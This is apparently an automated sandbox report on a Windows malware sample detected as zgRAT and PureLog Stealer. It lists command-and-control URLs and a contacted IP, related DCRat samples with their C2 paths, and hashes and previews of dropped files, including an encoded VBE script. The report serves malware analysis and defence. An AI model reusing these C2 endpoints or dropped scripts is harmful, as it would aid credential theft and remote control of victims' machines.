00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://703648cm.rePyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://www.carterandcone.comlyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.sajatypeworks.comyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.typography.netDyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ac.ecosia.org/autocomplete?q=yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.fontbureau.com/designers/cabarga.htmlNyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.founder.com.cn/cn/cTheyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.galapagosdesign.com/staff/dennis.htmyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.founder.com.cn/cnyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.fontbureau.com/designers/frere-user.htmlyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://703648cm.renyash.topyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.jiyu-kobo.co.jp/yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.galapagosdesign.com/DPleaseyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.fontbureau.com/designers8yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.fonts.comyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.sandoll.co.kryeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://703648cm.renyash.top/provider_cpugame.phppyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://www.urwpp.deDPleaseyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.zhongyicts.com.cnyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameChainFontruntimeCrt.exe, 00000004.00000002.1754509420.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.sakkal.comyeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      37.44.238.250
                                                                                                                      		703648cm.renyash.topFrance
                                                                                                                      		49434HARMONYHOSTING-ASFRtrue

                                                                                                                      General Information

                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1579116
                                                                                                                      Start date and time:2024-12-20 21:16:10 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 8m 15s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:15
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:8k1e14tjcx.exe
                                                                                                                      renamed because original name is a hash value
                                                                                                                      Original Sample Name:517d21cbe45c2a88930aa345c2a5c36b.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@18/267@1/1
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 33.3%
                                                                                                                      HCA Information:Failed
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.109.210.53, 92.122.16.236, 13.107.246.63
                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Execution Graph export aborted for target ChainFontruntimeCrt.exe, PID 7412 because it is empty
                                                                                                                      • Execution Graph export aborted for target yeeQesPXxpnDuwPWqTnUoVbi.exe, PID 7664 because it is empty
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • VT rate limit hit for: 8k1e14tjcx.exe

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      15:17:27API Interceptor1670172x Sleep call for process: yeeQesPXxpnDuwPWqTnUoVbi.exe modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      37.44.238.2504si9noTBNw.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.php
                                                                                                                      Qsi7IgkrWa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php
                                                                                                                      4Awb1u1GcJ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 143840cm.nyashteam.ru/DefaultPublic.php
                                                                                                                      s5duotgoYD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php
                                                                                                                      QMT2731i8k.exeGet hashmaliciousDCRatBrowse
                                                                                                                      • 117813cm.n9shteam.in/ExternalRequest.php
                                                                                                                      EQdhBjQw4G.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
                                                                                                                      3AAyq819Vy.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
                                                                                                                      HcEvQKWAu2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
                                                                                                                      k1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                                                                                                      • 452132cm.n9shteam2.top/Processdownloads.php
                                                                                                                      FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                      • 114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php

                                                                                                                      Domains

                                                                                                                      No context

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      HARMONYHOSTING-ASFRroze.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                      • 37.44.238.73
                                                                                                                      roze.armv4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                      • 37.44.238.73
                                                                                                                      roze.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                      • 37.44.238.73
                                                                                                                      roze.mipsel.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                      • 37.44.238.73
                                                                                                                      roze.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                      • 37.44.238.73
                                                                                                                      roze.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                      • 37.44.238.73
                                                                                                                      roze.m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                      • 37.44.238.73
                                                                                                                      roze.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                      • 37.44.238.73
                                                                                                                      roze.armv5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                      • 37.44.238.73
                                                                                                                      roze.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                      • 37.44.238.73

                                                                                                                      JA3 Fingerprints

                                                                                                                      No context

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\ChainagentComponent\21acf50272ad26

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):185
                                                                                                                      Entropy (8bit):5.705570769600795
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:RDty8WxyEQmaRguy3Qicg/QNC7Oc2jz0YioKhD/HTzQqq/EPADncGuHLUSSYKWJS:JtvEzaR3iDQNC7gjWRf7q/Zc5tSW7QIO
                                                                                                                      MD5:9E15F87E4AD0A96F5D963F9F5E9E9AD1
                                                                                                                      SHA1:EF1FA65BF1968569E91A3690E1670B1C43ED57B1
                                                                                                                      SHA-256:AE66EA9288D159D051C8D762F12201C51F279FA50593D5B8261F85164F0F3FC0
                                                                                                                      SHA-512:7AF8A1AF32284F3D585E027B676EE485629AE2A677F9D3925E0CB17B65ED9D0EE77456554A69EE6A27C4335DCD8ED82010BB5A742406F4295DD26548089AC913
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:VjHek2FtWYYbt2Wa5CAXLraOdtkjJSWRKBhGpPWS23HwZ6yosg50Nm9oJ3A0SfkDBGQsVQvqpreSjoyh461nXgEiC26vOfAXSEvSpGScuOKfHqEfFc6Vo7peCspcU9cKrH9f3f2xoZ2IViaVybqwiosUYQQ6bzHvw9xArjmjjIrPFhJdRUo2TpmDY

                                                                                                                      C:\ChainagentComponent\ChainFontruntimeCrt.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\8k1e14tjcx.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2043904
                                                                                                                      Entropy (8bit):7.572623220967923
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:McFZTdUJWxOOZPHst87uOLOkMRxJgSrSmMsc:MczpGWdZPHu9WuRx9rrJ
                                                                                                                      MD5:64105CB19AC25A6275C7D929937090A0
                                                                                                                      SHA1:4B0AB4A6FA17FEED05E183029F3A240D7860437D
                                                                                                                      SHA-256:CB2F1ACA28FCB0A43B1A256A1728A087EFED3D8144F0657C3DD5F4D5A0A6898C
                                                                                                                      SHA-512:7152D54DEF3FF633787549E7353330B949BB51AF3753B77A52B6FA24465CE635C985CBE28D7FC8ECBE4FE4E7B0B39933F79AD4E56817AAC45F8ABFFC0918E4B6
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Mg.................(...........F... ...`....@.. ....................................@..................................F..K....`.. ............................................................................ ............... ..H............text....&... ...(.................. ..`.rsrc... ....`.......*..............@....reloc..............................@..B.................F......H.......P...l...............*l...E.......................................0..........(.... ........8........E....8...9...........83...(.... ....8....(.... ....~d...{....9....& ....8....*(.... ....~d...{....:....& ....8........0.......... ........8........E....6.......*...........81......... ....~d...{....:....& ....8....r...ps....z*~....(7... .... .... ....s....~....(;....... ....~d...{....:q...& ....8f.......~....(?...~....(C... ....?.... ....~d...{....:0...& ....8%...~....:i

                                                                                                                      C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\8k1e14tjcx.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):252
                                                                                                                      Entropy (8bit):5.933375086181433
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:G7wqK+NkLzWbHnPv7qK+NkLzWHmRU7RLu2o2XFz3L/xgbOs:GyMCzWLnP/MCzWGRKdunAzb/0
                                                                                                                      MD5:82EA3A77040D884456B51FC284D887A3
                                                                                                                      SHA1:E5CABA4399CE043A758F78840D2323FFCE3D41B8
                                                                                                                      SHA-256:345CB6DB98F74263A91A2DABDE35F4D2AF5BBB909F1904D7B9B1D5D75864A2D8
                                                                                                                      SHA-512:79147CCBD6BAFBEEC3D7D21FC0E3F0F85CB340E54263B2925B42BBDA539D9F5B921D8E9DC950E51A7A1DA942AE75988A92470DAC6C6E73FDBEF76047EEFAFD91
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      Preview:#@~^4wAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v!b@#@&j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.k4?4+sscIEU~rZlz;4mkUmo.xY;Ws2W.+UYJz5qWpK8^vd|cX2LMZHM;UNpeS+B5_[2.m;eo2\q4`3\15^$L1Gt4blmLDHhc4CYr~~TBP0ms/.80kAAA==^#~@.

                                                                                                                      C:\ChainagentComponent\db08104604e511

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):136
                                                                                                                      Entropy (8bit):5.600859418421477
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:I0e2Ntn/iSMEty9ueQTZz5mXCuYWuJkTFNGAyk3NdBzWSy:I52NhisA9XGp5gCtxJ+Gq35A
                                                                                                                      MD5:8AE8FD13440CC8CC508102D6A192AB44
                                                                                                                      SHA1:D8EC9970FB497848041AAECC9C74AE23A444824D
                                                                                                                      SHA-256:540C463B6DA7191AF02D68D23994234420068D5B9C65FFEF34B2EC7CD02ACD67
                                                                                                                      SHA-512:6E00F075EC3E737FA50A3024A0FCCF0879BB9C1CF2B06953E7CB0E94405DA296B83DB166F9BF910D2AB9A121BB7171FF8BF44D79122108D79E60CEDEA6B7F974
                                                                                                                      Malicious:false
                                                                                                                      Preview:iBfrvMeDz1cvJhDYFv6VuYEIbGvZS28gKBKJL76JM2GoYi5BizaXHWXK6XPpbEu635lHW3NHzxI2SZt2Ku1cblYxoAMxrRsIHJvc7ypomTiUOf1hnWeqNSfRhxdVqZZhFAuInR5V

                                                                                                                      C:\ChainagentComponent\q14QT1c6LK4xpgG0MrqndXYweJYHdEecuYXEv1hUkMNQcqj9DhhAaajtNw.bat

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\8k1e14tjcx.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):77
                                                                                                                      Entropy (8bit):4.7765908473935506
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:rZtAABNlioR6EqAsplLjvW9znAn:1tlgfhAs3f4s
                                                                                                                      MD5:21C1A26270A6AC361060EF54B50810BC
                                                                                                                      SHA1:11D3ABD6D008458760130E6FFCC61D812A976094
